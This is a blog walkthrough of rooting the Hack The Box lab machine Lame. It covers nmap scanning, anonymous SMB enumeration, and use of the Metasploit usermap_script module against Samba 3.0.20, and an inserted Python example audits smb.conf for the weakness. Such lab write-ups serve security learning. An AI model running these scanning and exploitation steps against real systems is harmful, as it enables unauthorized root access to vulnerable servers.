15 November 2020, posted by Michele Pariani
How I hacked the Linux machine Lame on HTB

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.

The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3

The scan lists the open ports together with all the information nmap could gather about the services running behind them.

The result shows us that there are five open ports and four services running behind them:

  • FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
  • SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
  • DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
  • SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.

Firstly, we run smbclient -L \\\\10.10.10.3\\

We have access to the share names.

The result in the screenshot tells us that we can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$

We cannot access the ADMIN share.

Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPC$ but we can neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and the files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.

Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.
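On the defending side, the two conditions that make this attack possible, the non-default “username map script” option and anonymous access to shares, can both be checked directly in smb.conf. The following Python audit is an added example, not code from the post or from Samba: it parses a constructed weak configuration next to a hardened one; the script path, workgroup and share names are made up.

```python
# Constructed sample (not from the post) resembling the weak state it describes.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   ; non-default option: the client-supplied username is handed to a shell script
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = Bad User
[tmp]
   path = /tmp
   guest ok = yes
"""

# The same server with the two risky settings removed (no map script, guest access off).
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never
[tmp]
   path = /tmp
   guest ok = no
   valid users = @staff
"""


def parse_smb_conf(text):
    """Return {section: {key: value}}; Samba ignores case/whitespace in parameter names."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].split("#", 1)[0].strip()  # strip smb.conf comments
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf[section] = {}
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section]["".join(key.split()).lower()] = value.strip()  # 'Username Map Script' -> 'usernamemapscript'
    return conf


def audit_smb_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if "usernamemapscript" in g:
        findings.append("global: 'username map script' is set; untrusted usernames reach a shell")
    if g.get("maptoguest", "never").lower() != "never":
        findings.append("global: 'map to guest = %s' lets unauthenticated clients list shares" % g["maptoguest"])
    for name, share in conf.items():
        if name != "global" and share.get("guestok", "no").lower() in ("yes", "true", "1"):
            findings.append("share [%s]: 'guest ok = yes' allows access without a password" % name)
    return findings
```

Run `audit_smb_conf()` over each configuration: the weak one yields three findings, the hardened one none.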

Exploit Lame and Catch the Flags

Enter use exploit/multi/samba/usermap_script, set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

We are root on Lame!

We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
